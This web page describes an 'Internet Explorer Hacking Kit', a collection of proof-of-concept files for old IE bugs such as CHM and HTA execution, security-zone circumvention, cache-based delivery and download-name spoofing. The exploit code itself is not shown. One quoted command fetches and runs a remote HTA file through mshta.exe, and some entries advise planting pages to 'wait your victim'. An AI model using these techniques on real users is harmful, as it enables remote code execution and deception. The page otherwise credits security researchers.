Internet Explorer Hacking Kit 

Internet Explorer Hacking Kit is a tool box with
different tools and samples for playing with IE vulnerabilities.

In this kit you can find some examples and tools
for playing with Internet Explorer vulnerabilities.
This Tools was written by Valgasu.
Download Zip Source.
I Just add some notes , & Demos.

Description of files and directories content :

• Concepts
Demos to show concepts like HTML Application (HTA) and HTML Help (CHM).
• evilfile.chm , This CHM file shows how to launch 'command.com' with ActiveX HHCtrl.ocx and its Shortcut component.
• veryevilfile.chmThis CHM file shows how to get and launch a HTA file with 'mshta.exe http://valgasu.rstack.org/evilfile.hta'
• evilfile.hta This HTA file makes and launches an armless application to show the threat of HTA file.
• showhelp.htmlThis HTML page launches veryevilfile.chm with the method 'showHelp' .[ works only in My Computer zone]
• Vulnerabilities
Proofs of concept of several IE main vulnerabilities
• Security Zones
Different files to illustrate the circumventing of Internet Explorer security zones.
• Introduction:codebase.htmlCODEBASE vulnerability. This page launches notepad.exe on a Win9x system. [works only in My Computer zone]
• Circumventing:external.html HTML page exploiting the external object caching vulnerability. Put this on a web server and wait your victim.
• Circumventing:object.html exploitation of object zone redirection vulnerability
• Circumventing: redirect.asp A simple ASP page redirects on a local file (res://shdoclc.dll/about.dlg) Use with object.html.
• Execution:assign.html : An HTML page exploiting the external assign method caching vulnerability. Put this on a web server and wait your victim.
• Execution: sandblad.html : An HTML page exploiting the Sandblad advisory #10
• Temporary Internet Files
Different files to illustrate vulnerabilities using Temporary Internet Files (TIF).
• Introduction:silent.htmlA simple HTML page showing how to deliver a CHM file in the TIF.
• Introduction:veryevilfile.chm CHM file to use with silent.html
• Attachment:htmlinchm.pl A simple perl script to add HTML at the end of a CHM file.
• Attachment: htmlinchm-v2.pl A modified version of htmlinchm.pl (encode the HTML page in ASCII before adding at the end of CHM file).
• Attachment:evilfile.chm and evilscript.html : Sample files for htmlinchm.pl
• Attachment: evilfile.chm.html : Result of htmlinchm.pl launches 'command.com'. This file can be use in attachment mail (doesn't work with OE only with Outlook) or with html_attach.pl
• Attachment: html_attach.pl : A simple perl script forcing popup to download a HTML page.
• Enumeration: enumeration.html :A HTML page enumerating the different TIF location. [works only in My Computer zone.]
• Enumeration: combined.html : A HTML page exploit the attack of Jelmer with the use of assign method caching vulnerability.
• Content types
• Execution:autoexec.emlThis mail launches automatically the armless attachment
• Execution:evilcontent.pl A simple web server in perl with custom Content-type and Content-disposition fields
• Spoofing:spoofname.plA simple web server in perl for spoofing download filename
• Spoofing: evilfile.hta A HTA file to use with spoofname.pl
• Spoofing:example1.eml and example2.eml : A Two mails illustrating the icon spoof with Outlook Express
• Spoofing: example1.mhtml and example2.mhtml Two MHTML pages illustrating download filename spoofing
• Miscellaneous
• silent-delivery.txt A short text about differents triks to silent delivery a program in the TIF.
• execution-method.txt A short text about two methods for executing the program.
• attack-sample.html + base.html A proof of concept based on GreyMagic work and Jelmer enumeration technic.
• Unorthodox Bug Finding Techniques
• Unorthodox Bug Finding Techniques (by thePull)
• Respect - Security Read More & Links
All of this is inspired by all the work of several people like Malware, Sandblad, Jelmer, Thor Larholm, GreyMagic Security Team, Georgi Guninski, Liu Die Yu, Elia Florio... and all others
BRAVO !!! --= Valgasu =--
• by Valgasu - valgasu@rstack.org ,fr
• Liu Die Yu- Super 17 years old ,China
• GreyMagic , Master , IL
• Guninski , #1 Path Finder , Bu
• malware- http-equiv@malware.com
• sandblad- Andres sandblad , se
• Thor Larholm- Pivx
• security focus- Bugtraq